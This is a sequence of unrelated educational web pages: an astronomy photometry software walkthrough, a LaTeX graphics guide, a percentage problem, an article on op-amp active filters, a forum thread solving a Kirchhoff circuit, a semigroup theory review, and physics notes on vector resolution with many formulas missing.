PHOTOM is now set up ready to measure stars and sky background. Type m and when prompted for the display device use xoverlay. The text boxes that appear towards the bottom of the display refer to the corresponding mouse buttons. Proceed as follows.
(a)
Position the cursor over the object to be measured and click the left mouse button or enter 1 from the keyboard.
(b)
Repeat the procedure for all the objects which you wish to measure.
(c)
To finish, click on the right mouse button or enter 0 from the keyboard and you will return to the PHOTOM ‘COMMAND’ prompt.
The resulting display will look something like Figure 8. As each star is measured the terminal or workstation will output the results (and echo them to the output file specified when starting PHOTOM):
COMMAND - PHOTOM /’Values’/ > m
DEVICE - Display device /@xwindows/ > xoverlay
Select operation according to screen menu
Left hand box - Press left hand mouse button
Centre box - Press centre mouse button
Right hand box - Press right hand mouse button
====================================================================
nx ny a e theta
384 256 8.00 0.000 0.0
x y mag magerr sky signal code
1 57.70 157.74 19.322 0.011 489.965 18675.065
2 58.90 232.74 18.571 0.007 493.119 37287.484
3 66.94 250.43 20.447 0.025 493.768 6622.757 E
4 81.58 65.64 17.059 0.003 489.962 150087.483
5 362.25 66.61 18.209 0.005 491.481 52030.981
COMMAND - PHOTOM /’Values’/ >
If you are working through the recipe the actual values you obtain will probably be slightly different because you will have positioned the apertures differently. The meaning of each of the columns is described in SUN/45. Notice the following:
• measurements of both sky and object are given,
• magnitude values are relative to an artificial sky value of 30,
• object 3 is the star that has been measured at the top of the image. It can be seen that the inner aperture has crossed the edge of the frame. Therefore some proportion of the flux here will have been lost. This problem has been recognized by flagging the result with an ‘E’ in the code column, the ‘E’ standing for ‘edge’.
(8)
It is also possible to use an interactive aperture to sample the background. Here representative areas of sky are sampled independently of the measured object. The procedure is as follows.
(a)
Type a to toggle the Annulus choice. The message ‘Interactive aperture in use’ should be displayed.
(b)
Type m
(c)
Move the cursor to a blank patch of sky. Usually the patch chosen will be close to the object to be measured. Click on the middle mouse button. An aperture corresponding to the patch of sky measured will be shown. You can repeat this procedure for several patches of sky if you wish. Note that the sky must be measured before measuring any objects.
(d)
Move the cursor over the object to be measured and click on the left mouse button (or enter 1 from the keyboard).
(e)
You can make further measurements of the objects and the sky background as you wish.
(f)
To finish click on the right mouse button (or enter 0 from the keyboard).
The resulting display will look something like Figure 9.
(9)
You should measure all the stars which you are interested in in the current frame. Their instrumental magnitudes will be included in the output file written by PHOTOM. Alternatively, if you prefer, you can make a note of the instrumental magnitudes as they are displayed (though this approach is more prone to mistakes).
(10)
This recipe has shown the interactive use of PHOTOM. PHOTOM also contains an application called autophotom which allows PHOTOM to be used non-interactively (see SUN/45[22] for details).
11Strictly speaking you must use display software which accesses the Starlink graphics database (see SUN/48[21]). However, you will not normally be aware of the graphics database and certainly do not need to know anything about it. It is simply a mechanism which allows different applications to co-operate in using the same plot.
12An image displayed with the lutneg colour table mimics the appearance of a conventional astronomical photographic plate: stars appear as dark spots on a light background. Various other colour tables are available in KAPPA. For example, lutgrey sets up a positive grey-scale (light stars against a dark background) and lutheat sets up a pseudo-heat sequence.
13The intensity profiles of the images of extended objects usually fall off more slowly with increasing radius than those of stars and hence when working with extended objects it is necessary to be careful to choose an aperture sufficiently large to include the required fraction of the total light from the object. | 2018-01-20 11:12:11 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 1, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.537265956401825, "perplexity": 296.45058332677115}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084889567.48/warc/CC-MAIN-20180120102905-20180120122905-00192.warc.gz"} |
https://www.cv.nrao.edu/~abridle/l2h4nrao/node31.shtml | Next: 9.2 Separate handling of .gif/.jpg/.png and .ps input Up: 9 Templates Previous: 9 Templates
## 9.1 Flexible inclusion of figures in different graphics formats
Unfortunately, no single graphics input format is supported by all three of LATEX, pdflatex, and LATEX2HTML.
Table 2: Graphics Support
Package Input Format Output Format
LATEX .eps, .ps .dvi, .ps
pdflatex .jpg, .pdf, .png, .tif .pdf
LATEX2HTML same as LATEX .gif/.png, .html
This complicates production of graphics-rich documents if Postscript, PDF and HTML output are all required. It is possible however to code a LATEX figure environment call so that the same source text brings in different graphics files as needed by the different compilers. The following template shows how to do this with \usepackage{graphicx} included in the document preamble:
\begin{figure}[thp]
\begin{center}
\includegraphics[width=4in]{fig1}
\caption{Caption text.}
\label{fig:labeltext}
\end{center}
\end{figure}
\includegraphics will search for the file fig1.eps when LATEX is run, either directly or by running LATEX2HTML. LATEX2HTML will convert the input fig1.eps graphic into a .gif or .png file using the LATEX engine, then the dvips, Ghostscript and netpbm utilities. The same \includegraphics call will also search for whichever of fig1.pdf or fig1.jpg are in the source directory if pdflatex is run to produce .pdf output.
The example shown requests that the graphic be reproduced with a width of 4 inches. includegraphics also lets you specify a scale factor, angle of rotation, image width, and/or image height, for example:
\includegraphics[scale=0.5]{<filename>}
\includegraphics[angle=45]{<filename>}
\includegraphics[width=2in]{<filename>}
\includegraphics[totalheight=4in]{<filename>}
\includegraphics[scale=0.5,totalheight=4in]{<filename>}
Next: 9.2 Separate handling of .gif/.jpg/.png and .ps input Up: 9 Templates Previous: 9 Templates
Home | Contact Us | Directories | Site Map | Help | Search
2001-06-08 | 2022-01-29 10:49:46 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.22084163129329681, "perplexity": 13037.930133094746}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320304883.8/warc/CC-MAIN-20220129092458-20220129122458-00004.warc.gz"} |
https://socratic.org/questions/58530d93b72cff3f6cc5a485 | # What number do we get if we decrease 208 by 35%?
You end up with 135.20
#### Explanation:
We can do this a couple of different ways.
One way is to multiply 208 by 35%, subtract that result from 208, and see what we end up with:
208xx35%=208xx0.35=72.80
$208 - 72.8 = 135.20$
We can also work the problem by seeing what's left after we're done decreasing.
Think of this question this way - if we decrease a number, say 100, by a percentage, say 35%, what percentage will be left?
We can work this out by taking 100 things and decreasing it by 35% - 35% of 100 is 35 things - and so we take away 35 things and are left with 65 things, which is 65% of 100.
So we can say that when we decrease by 35%, we are left with 100%-35%=65%.
To decrease 208 by 35%, we can multiply by 65% to see what will be left:
208xx65%=208xx0.65=135.20 | 2019-10-14 00:41:57 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 7, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7548555135726929, "perplexity": 451.3360064833433}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986648481.7/warc/CC-MAIN-20191014003258-20191014030258-00250.warc.gz"} |
https://www.allaboutcircuits.com/technical-articles/inductor-out-op-amp-in-an-introduction-to-second-order-active-filters/ | In this article, we’ll compare active and passive filters and look at some common second-order active topologies.
### Active vs. Passive
If your filter consists of nothing more than resistors, capacitors, and inductors, you have a passive filter. The circuit becomes “active” when you incorporate an active component, e.g., a transistor. Theoretically, you could design an active-filter circuit using an individual transistor in conjunction with passive components, but in practice, the active component of choice is an operational amplifier. Op-amps offer performance advantages over individual transistors, and they also simplify the process of designing and analyzing a filter circuit. So as you read this article, keep in mind that for all practical purposes “active filter” means “op-amp-based active filter.”
### Passive ≠ Bad
It is important to understand that active filters are not inherently “better” than passive filters. On the contrary, I prefer passive filters and use them whenever possible. Some advantages of the old-fashioned approach are the following:
• There is no need to worry about the nonideal characteristics of the op-amp—offset voltage, bandwidth limitations, noise. . . .
• Breadboarding or PCB layout is simpler and cleaner without the power and ground connections required by the op-amp.
• Passive circuits are more straightforward and hence less subject to design errors—for example, compare a resistor-inductor-capacitor (RLC) low-pass filter (see the next section) to an equivalent Sallen–Key circuit (scroll down to the “Sallen–Key” section).
Active filters certainly have their advantages though. The most prominent benefit that applies to both first-order and second-order filters is the improved impedance characteristics. Op-amps provide high input impedance and low output impedance, and thus an op-amp-based active filter can outperform a passive implementation when the incoming signal has relatively high source impedance or when the output signal must drive relatively low load impedance.
Another advantage is gain: If the signal needs to be not only filtered but also amplified, you really have no choice but to use an active filter—either a specific active-filter topology or a passive-filter-plus-amplifier arrangement.
Before we continue, I should point out that it is certainly possible to create a second-order active filter that consists of an op-amp and two first-order filters. The two filter stages are connected in series, with the op-amp buffering the output of the first stage. These “cascaded” filters inevitably produce a gradual transition from passband to stopband, resulting in nonlinear phase response and significant attenuation of signals near the end of the passband. The two second-order topologies discussed below are usually preferable because they allow you to optimize an individual circuit for sharper transition from passband to stopband, minimal passband attenuation, or linear phase response.
### The Nefarious Inductor
As indicated by its title, this article focuses on second-order active filters, i.e., filters that have two poles in their transfer functions and thus achieve steeper roll-off. Passive filters need two energy storage elements—a capacitor and an inductor—to provide a second-order response . . . and this is where the trouble begins. Here is a second-order RLC low-pass filter, with equations for the cutoff frequency (fc) and the quality factor (Q):
$f_c=\frac{1}{2\pi\sqrt{LC}}\ \ \ \ \ \ \ \ \ Q=\left(2\pi f_c\right)\times CR$
This otherwise respectable filter is tainted by its association with the inductor. The fact is, inductors are downright unpopular, and here’s why:
• They’re bulky, and as you have probably noticed, electronics manufacturers want to make their widgets smaller, not bigger.
• Inductors are not particularly compatible with integrated-circuit manufacturing techniques:
• You can’t get much inductance out of an IC inductor, which means the cutoff frequency of the filter can’t go very low.
• IC inductors are seriously nonideal; the various parasitic impedances of the IC environment are more problematic than those experienced by discrete inductors.
• Inductors generate more electromagnetic interference (EMI) than resistors and capacitors, and they are also more susceptible to EMI.
The clear conflict between inductors and the trends that dominate the electronics industry—miniaturization, monolithic fabrication, wireless functionality—is a major motivation for pursuing second-order filters that do not require inductance.
### Antoniou and His Simulated Inductor
One way to avoid the problems associated with inductors is to use a circuit that behaves like an inductor yet requires only resistors, capacitors, and op-amps. The following “inductance-simulation circuit” was invented by Andreas Antoniou:
$equivalent\ inductance:\ L=\frac{R_1R_3R_4C_1}{R_2}$
How Professor Antoniou ever figured this out is beyond me. In any event, I’m not going to dwell on this circuit because the Sallen–Key and Multiple Feedback (MFB) topologies are a simpler and more direct route to second-order filter performance. It’s good to be aware, though, that various RLC filters can be implemented without inductors by using an inductance-simulation circuit.
### Sallen–Key
A Sallen–Key filter gives you two poles with only one op-amp and a few passives. The following is a Sallen–Key implementation of a unity-gain low-pass filter.
$f_c=\frac{1}{2\pi\sqrt{R_1C_1R_2C_2}}$
It is often the case that there is no need to amplify any portion of the input signal; the filter is there to suppress unwanted frequencies, and it’s fine if the frequencies of interest merely pass through. These unity-gain applications are common enough to make the Sallen–Key a very popular filter, despite the fact that the MFB topology is advantageous when the gain becomes significantly higher than unity.
Let’s think about what happens at low frequencies. C1 and C2 become open circuits, and the resistors become irrelevant because the current flowing into the op-amp’s positive input terminal is negligible. Thus, we are left with a voltage follower. This means that 1) the Sallen–Key filter does not invert the signal and 2) the gain will be almost exactly unity without any dependence on component values. As you will see in the next section, the gain of the MFB circuit is determined by component values, even at unity gain, and this explains why the Sallen–Key topology is preferred for unity-gain applications.
For much more information on the Sallen–Key topology, click here (PDF) for a Texas Instruments app note that just might tell you everything you ever wanted to know about op-amp-based active filters. Another valuable resource is this online filter design tool, which will help you with Sallen–Key low-pass and high-pass circuits.
### Multiple Feedback
Here is an MFB low-pass circuit:
$f_c=\frac{1}{2\pi\sqrt{R_2R_3C_1C_2}}$
$DC\ gain\ =\ \frac{R_3}{R_1}$
If you replace the capacitors with open circuits and ignore R2 (again, because the input current is negligible), you will recognize the standard op-amp inverting configuration:
Thus, MFB is an inverting topology. You might recall that there is no inverting version of a voltage follower; if you need a unity-gain inverting op-amp circuit, you have to use an inverting amplifier with R1 = R3. The same applies to the MFB topology: for unity gain, you set R1 = R3, which means that the accuracy of your gain depends on the precision of your resistors. As the gain increases, though, an MFB circuit actually becomes less sensitive to component tolerances than an equivalent Sallen–Key implementation, so MFB is usually a better choice for higher-gain filters. The app note mentioned in the previous section is also a great resource for MFB circuits, and the same online filter tool can help you with MFB filter design.
### Conclusion
We’ve covered quite a bit of introductory information related to why we use second-order active filters and how we create second-order circuits using a single op-amp in conjunction with capacitors and resistors. However, we’ve only scratched the surface of this expansive subject. Keep an eye out for future articles that explore these and related topics in greater detail. | 2017-05-24 21:27:45 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4668215215206146, "perplexity": 1553.9726664236919}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-22/segments/1495463607862.71/warc/CC-MAIN-20170524211702-20170524231702-00001.warc.gz"} |
http://openstudy.com/updates/55db499ee4b02663346c19a9 | 1. rvc
|dw:1440434594670:dw|
2. rvc
3. rvc
|dw:1440434946834:dw|
4. arindameducationusc
wow... nice one.. i just had my dinner... was about to sleep.. would you mind if I do tomorrow morning?
5. IrishBoy123
i can have a try later today
6. Michele_Laino
I think that we have to apply the second and first principle of Kirchhoff
7. rvc
yep
8. Michele_Laino
|dw:1440436198619:dw| we have to suppose the existence of those currents, I1,...,I6
9. rvc
okay
10. Michele_Laino
now, we have to write the first principle of Kirchhoff at each node
11. rvc
incoming ccurrents= outgoing currents
12. Michele_Laino
yes! or algebraic sum of currents=0
13. rvc
yep
14. Michele_Laino
I label each node as below: |dw:1440436439762:dw|
15. rvc
oh okay
16. Michele_Laino
for node A: $\Large {I_2} + 20 - {I_3} = 0$
17. Michele_Laino
for node B: $\Large {I_3} - {I_4} - 120 = 0$
18. Michele_Laino
for node C: $\Large {I_4} + 110 - {I_5} = 0$
19. Michele_Laino
for node D $\Large {I_5} - {I_6} - 60 = 0$
20. Michele_Laino
for node Y: $\Large {I_6} + 80 - {I_1} = 0$
21. rvc
can we asume current through ab as I1 and ax as 20-I1 ?
22. Michele_Laino
for node X: $\Large {I_1} - {I_2} - 30 = 0$
23. Michele_Laino
with those equations, we have expressed the conservation of electrical charge
24. Michele_Laino
now, we have to happly the second principle of Kirchhoff, namely the subsequent equation for electrostatic field E: $\Large \nabla \times {\mathbf{E}} = 0$ in order to do that we have to establish a positive sense into our circuit, like this: |dw:1440436999284:dw|
25. Michele_Laino
here is the missing equation: $\large {V_{XY}} + 0.01{I_2} + 0.01{I_3} + 0.03{I_4} + 0.01{I_5} + 0.02{I_6} = 0$
26. Michele_Laino
so, you have to determine all currents, I1,...,I6, then substituting into last equation, you will get the requested voltage drop Vxy
27. Michele_Laino
@rvc
28. mathmate
Hmm, There are 6 equations for 7 unknowns! @Michele_Laino I put 5 equations for the joints (the sixth is redundant) and the Kirchhoff's second law as 0.02*I1+0.01*I2+0.01*I3+0.03*I4+0.01*I5+0.02*I6=0 instead of using Vxy, and I seem to get satisfactory results, with I4 and I6 negative. Do you get the similar results? @rvc
29. Michele_Laino
if we collect all those equations above, we get the complete system as below: $\Large \left\{ \begin{gathered} {I_2} + 20 - {I_3} = 0 \hfill \\ \hfill \\ {I_3} - {I_4} - 120 = 0 \hfill \\ \hfill \\ {I_4} + 110 - {I_5} = 0 \hfill \\ \hfill \\ {I_5} - {I_6} - 60 = 0 \hfill \\ \hfill \\ {I_6} + 80 - {I_1} = 0 \hfill \\ \hfill \\ {I_1} - {I_2} - 30 = 0 \hfill \\ \hfill \\ {V_{XY}}{\text{ }} + {\text{ }}0.01{I_2}{\text{ }} + {\text{ }}0.01{I_3}{\text{ }} + {\text{ }} \hfill \\ {\text{ + }}0.03{I_4}{\text{ }} + {\text{ }}0.01{I_5}{\text{ }} + {\text{ }}0.02{I_6}{\text{ }} = {\text{ }}0 \hfill \\ \end{gathered} \right.$
30. mathmate
What I was saying is that there are 5 independent equations out of the first 6, so the last one will fill the void by expression Vxy as 0.02*I1. Then we get to have 6 equations, and 6 unknowns (I1 to I6).
31. IrishBoy123
yes, first 5 plus 0.02*I1+0.01*I2+0.01*I3+0.03*I4+0.01*I5+0.02*I6=0 gets there! [ 61. 31. 51. -69. 41. -19.]
32. mathmate
Yep, I got the same answers.
33. mathmate
Don't forget to find Vxy=61*0.02=1.22 V... etc. | 2017-01-17 15:10:47 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7606261968612671, "perplexity": 4951.101016750143}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00330-ip-10-171-10-70.ec2.internal.warc.gz"} |
https://zbmath.org/?q=an:0614.20043&format=complete | ## Tolerance distributive and tolerance modular varieties of commutative semigroups.(English)Zbl 0614.20043
A “tolerance” on a semigroup $$S$$ is a reflexive and symmetric subsemigroup of $$S\times S$$. The author proves the following theorem: a variety $$V$$ of commutative semigroups is tolerance modular, that is, each member of $$V$$ has modular lattice of tolerances, if and only if $$V$$ satisfies an identity $$xy=xyz^ n$$ for some positive integer n. Further, amongst such varieties, only the variety of “zero”, or “null”, semigroups and the trivial variety are tolerance distributive.
Reviewer: P.R.Jones
### MSC:
20M07 Varieties and pseudovarieties of semigroups 08A30 Subalgebras, congruence relations 08B10 Congruence modularity, congruence distributivity 20M14 Commutative semigroups
### References:
[1] Chajda I.: Lattices of compatible relations. Arch. Math. (Brno) 13 (1977), 89-96. · Zbl 0372.08002 [2] Chajda I., Zelinka B.: Lattices of tolerances. Čas. pěst. mat. 102 (1977), 10-24. · Zbl 0354.08011 [3] Chajda I.: Distributivity and modularity of lattices of tolerance relations. Algebra Universalis 12 (1981), 247-255. · Zbl 0469.08003 [4] Clifford A. H., Preston G. B.: The algebraic theory of semigroups. Vol. I. Am. Math. Soc., 1961. · Zbl 0111.03403 [5] Petrich M.: Introduction to Semigroups. Merill Publishing Company, 1973. · Zbl 0321.20037 [6] Pondělíček B.: Modularity and distributivity of tolerance lattices of commutative separative semigroups. Czech. Math. J. 35 (1985), 333 -337. · Zbl 0573.20062 [7] Zelinka B.: Tolerance in algebraic structures II. Czech. Math. J. 25 (1975), 175-178. · Zbl 0316.08001 [8] Ore O.: Structures and group theory II. Duke Math. J. 4 (1938), 247-269. · Zbl 0020.34801
This reference list is based on information provided by the publisher or from digital mathematics libraries. Its items are heuristically matched to zbMATH identifiers and may contain data conversion errors. It attempts to reflect the references listed in the original paper as accurately as possible without claiming the completeness or perfect precision of the matching. | 2023-03-30 05:43:23 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5926148295402527, "perplexity": 3113.4618612589566}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949097.61/warc/CC-MAIN-20230330035241-20230330065241-00608.warc.gz"} |
https://edurev.in/studytube/Resolution-of-Vectors-Motion-in-a-Plane--Class-11-/f7f50a4e-4919-4659-a0bc-b16242283a3a_t | NEET > Resolution of Vectors: Motion in a Plane
# Resolution of Vectors: Motion in a Plane - Notes | Study Physics Class 11 - NEET
1 Crore+ students have signed up on EduRev. Have you?
7. RESOLUTION OF VECTORS
If and be any two non-zero vectors in a plane with different directions and be another vector in the same plane. can be expressed as a sum of two vectors-one obtained by multiplying by a real number and the other obtained by multiplying by another real number.
(where l and m are real numbers)
We say that has been resolved into two component vectors namely
(where l and m are real number)
We say that has been resolved into two component vectors namely
and along and respectively. Hence one can resolve a given vector into two component vectors along a set of two vectors - all the three lie in the same plane.
7.1 Resolution along rectangular component :
It is convenient to resolve a general vector along axes of a rectangular coordinate system using vectors of unit magnitude, which we call as unit vectors. are unit along x, y and z-axis as shown in figure below :
7.2 Resolution in two Dimensions
Consider a vector that lies in xy plane as shown in figure,
⇒
The quantities Ax and Ay are called x-and y-components of the vector .
Ax is itself not a vector but is a vector and so it .
Ax = A cosθ and Ay = A sinθ
It's clear from above equation that a component of a vector can be positive, negative or zero depending on the value of q. A vector can be specified in a plane by two ways :
(a) its magnitude A and the direction q it makes with the x-axis; or
(b) its components Ax and Ay A = , θ =
Note : If A = Ax ⇒ Ay = 0 and if A = Ay ⇒ Ax = 0 i.e., components of a vector perpendicular to itself is always zero. The rectangular components of each vector and those of the sum are shown in figure.
We saw that
is equivalent to both
Cx = Ax + Bx
and Cy = Ay + By
Refer figure (b)
Vector has been resolved in two axes x and y not perpendicular to each other. Applying sine law in the triangle shown, we have
or Rx = and Ry =
If α+β = 90°, Rx = R sinβ and Ry = R sin
Ex.7 Resolve the vector along an perpendicular to the line which make angle 60° with x-axis.
Sol.
so the component along line = |Ay cos 30° + Ax cos 60°| and perpendicular to line = |Ax sin 60° - Ay sin 30°|
Ex.8 Resolve a weight of 10 N in two directions which are parallel and perpendicular to a slope inclined at 30° to the horizontal
Sol. Component perpendicular to the plane
= = N
and component parallel to the plane
W|| =W sin 30° = (10) = 5 N
Ex.9 Resolve horizontally and vertically a force F = 8 N which makes an angle of 45° with the horizontal.
Sol. Horizontal component of is
FH = F cos 45° = (8) =
and vertical component of is
Fv = F sin 45° = = Ans.
8. PROCEDURE TO SOLVE THE VECTOR EQUATION
...(1)
(a) There are 6 variables in this equation which are the following :
(1) Magnitude of and its direction
(2) Magnitude of and its direction
(3) Magnitude of and its direction.
(b) We can solve this equation if we know the value of 4 variables [Note : two of them must be directions]
(c) If we know the two direction of any two vectors then we will put them on the same side and other on the different side.
For example
If we know the directions of and and direction is unknown then we make equation as follows:-
(d) Then we make vector diagram according to the equation and resolve the vectors to know the unknown values.
Ex.10 Find the net displacement of a particle from its starting point if it undergoes two successive displacements given by , 37° North of West, , 53° North of East
Sol.
Angle from west - east axis (x - axis)
Ex.11 Find magnitude of and direction of . If makes angle 37° and makes 53° with x axis and has magnitude equal to 10 and has 5. (given )
Sol.
B = 5 (magnitude can not be negative) & Angle made by A
Ex.12 Find the magnitude of F1 and F2. If F1, F2 make angle 30° and 45° with F3 and magnitude of F3 is 10 N. (given = )
Sol.
9. SHORT-METHOD
If their are two vectors and their resultant make an angle α with . then A sin α = β sin β
Means component of perpendicular to resultant is equal in magnitude to the component of perpendicular to resultant.
Ex.13 If two vectors and make angle 30° and 45° with their resultant and has magnitude equal to 10, then find magnitude of
Sol. B sin 60° = A sin 30°
⇒ 10 sin 60° = A sin 30°
⇒ A =
Ex.14 If and have angle between them equals to 60° and their resultant make, angle 45° with and have magnitude equal to 10. Then Find magnitude of .
Sol. here a = 45° and b = 60° -45° = 15°
so A sinα = B sinβ
10 sin 45° = B sin 45°
So B =
=
10. ADDITION AND SUBTRACTION IN COMPONENT FORM :
Suppose there are two vectors in component form. Then the addition and subtraction between these two are
Also if we are having a third vector present in component form and this vector is added or subtracted from the addition or subtraction of above two vectors then
Note : Modulus of vector A is given by
Ex.15 Obtain the magnitude of if
and
Sol.
Magnitude of
= Ans.
Ex.16 Find and if make angle 37° with positive x-axis and make angle 53° with negative x-axis as shown and magnitude of is 5 and of B is 10.
Sol.
for
+ =
so the magnitude of resultant will be = =
and have angle θ = from negative x - axis towards up
for
So the magnitude of resultant will be
=
and have angle from positive x-axis towards down.
11. MULTIPLICATION OF VECTORS (The Scalar and vector products) :
11.1 Scalar Product
The scalar product or dot product of any two vectors and , denoted as . (read dot ) is defined as the product of their magnitude with cosine of angle between them.
Thus,
(here θ is the angle between the vectors)
Properties :
• It is always a scalar which is positive if angle between the vectors is acute (i.e.< 90°) and negative if angle between them is obtuse (i.e., 90° < q £ 180°)
• It is commutative i.e.
• It is distributive, i.e.
• As by definition . = AB cosθ . The angle between the vectors θ =
Geometrically, B cosθ is the projection of onto and vice versa
Component of along = B cosθ = = (Projection of on )
Component of along = A cosθ = = (Projection of on )
• Scalar product of two vectors will be maximum when cosθ = max = 1, i.e., θ = 0°,
i.e., vectors are parallel ⇒
• If the scalar product of two non-zero vectors vanishes then the vectors are perpendicular.
• The scalar product of a vector by itself is termed as self dot product and is given by
= AA cosθ = A2
• In case of unit vector ,
In case of orthogonal unit vectors,
Ex.17 If the vectors and are perpendicular to each other. Find the value of a?
Sol. If vectors and are perpendicular
⇒
⇒ a2 -2a -3 = 0 ⇒ a2 -3a a -3 = 0
⇒ a(a -3) +1 (a -3 ) ⇒ a = -1, 3
Ex.18 Find the component of along ?
Sol. Component of along is given by hence required component
=
Ex.19 Find angle between and ?
Sol. We have cosθ =
cosθ = = θ = cos-1
Ex.20 (i) For what value of m the vector is perpendicular to
(ii) Find the component of vector along the direction of ?
Sol.
(i) m = -10 (ii)
Important Note :
Components of b along and perpendicular to a.
Let . represent two (non-zero) given vectors a, b respectively. Draw BM perpendicular to
From ΔOMB, =
Thus are components of b along a and perpendicular to a.
Now
Hence, components of b along a perpendicular to a are.
(a . b/ |a|2) a and b - (a . b / |a|2) a respectively.
Ex.21 The velocity of a particle is given by . Find the vector component of its velocity parallel to the line .
Sol. Component of along
11.2 Vector product
The vector product or cross product of any two vectors and , denoted as
(read cross ) is defined as :
Here θ is the angle between the vectors and the direction is given by the right - hand - thumb rule.
Right - Hand - Thumb Rule :
To find the direction of , draw the two vectors and with both the tails coinciding. Now place your stretched right palm perpendicular to the plane of and in such a way that the fingers are along the vector and when the fingers are closed they go towards . The direction of the thumb gives the direction of .
Properties :
• Vector product of two vectors is always a vector perpendicular to the plane containing the two vectors i.e. orthogonal to both the vectors and , though the vectors and may or may not be orthogonal.
• Vector product of two vectors is not commutative i.e. But
• The vector product is distributive when the order of the vectors is strictly maintained i.e.
• The magnitude of vector product of two vectors will be maximum when sinθ = max = 1. i.e. θ = 90°
